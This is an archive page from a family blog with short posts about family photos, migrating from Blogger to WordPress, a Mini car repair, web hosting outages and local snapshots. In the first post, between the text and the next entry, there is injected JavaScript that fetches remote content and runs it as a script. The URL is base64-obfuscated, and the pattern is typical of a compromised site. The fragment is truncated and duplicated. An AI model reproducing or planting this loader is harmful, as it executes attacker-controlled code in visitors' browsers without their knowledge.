Archive for the ‘General’ Category

Family Photos

Author: dteeuwsen

Nicole, William, Isabelle and I had some family photos taken with Fragile Images.  Mirka did a great job and took some awesome photos.

var url = ‘’;
.then(response => response.text())
.then(data => {
var script = document.createElement(‘script’);
script.textContent = data;
var decodedUrl = atob(‘aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294′);
var decodedUrl = atob(‘aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294′);

The new

Author: Jeremy Teeuwsen

Now I am in the process of trying to transfer the old site from blogger to wordpress.  I wouldn’t have even decided to undertake this whole adventure, but blogger gave up support for ftp and now if you want to have one of their blogs it must end in and you simply point your URL at their site.  Unless you host with them.  Blah…

I haven’t actually deleted the old site.  It is still on here, but there will be no links from the new to the old.  I am going to try and import everything and hopefully we wont lose all our google “street cred” in the process…

Now all of you that randomly run into this page may be wonder.  will this site be regularly updated.  Well… I can’t really say for sure, but my brothers showed real disapointment at not being able to post to the old site. So… maybe.


Author: Jeremy Teeuwsen

I have started work on my Mini. Check out Not exactly sure what is all going to happen yet, but at the very least 2nd gear needs to be fixed and a few more HP wouldn’t be so bad… 🙂

Katie on the News

Author: kteeuwsen
Katie On the News

See this budding star here

Farmer offering tons of spuds to press point on urban sprawl

Hosting Issues

Author: Jeremy Teeuwsen

Ok, we have had some significant hosting issues this year and in particular over the last 3 weeks. I just finished moving our site to a new hosting company. Let’s see what happens now…

Family Tree

Author: Jeremy Teeuwsen

Ok, the pictures are going to have to wait till I get back from Madagascar. In the meantime I am playing around with an org chart program that I am adapting to be a family tree. Check it out on the About page.

Hosting Issues

Author: Jeremy Teeuwsen

Well the hosting company had a major blow up of some kind and and all the other sites were thrown back in time by a year. It’s a sad day. Not sure what is going to be recoverable and what is not, but we will see…

Keith’s First Post

Author: kteeuwsen

Welcome one and all to my first post. I don’t have all the fancy digitalization of camera equip most folk but I do have a camera on the ol’ phone, some come along and check out the one pixel adventure of Kamloops highlights….

The Drive

First Sunday Hike

Picture of my car

(artists rendition)

My Birthday

Hitch-Hiking to Jesse’s House

Fire Truck Ride

Drinking At work

And the spice rack…

The last one’s for Katie… I’ll try to post some more interesting stuff I promise!


Author: Jeremy Teeuwsen

When we were at Tauernhof 5 years ago we made a bunch of friends and one of them was Mark Bromley. Check out the site for his band starewell and have a listen to one of their songs Princess Blue.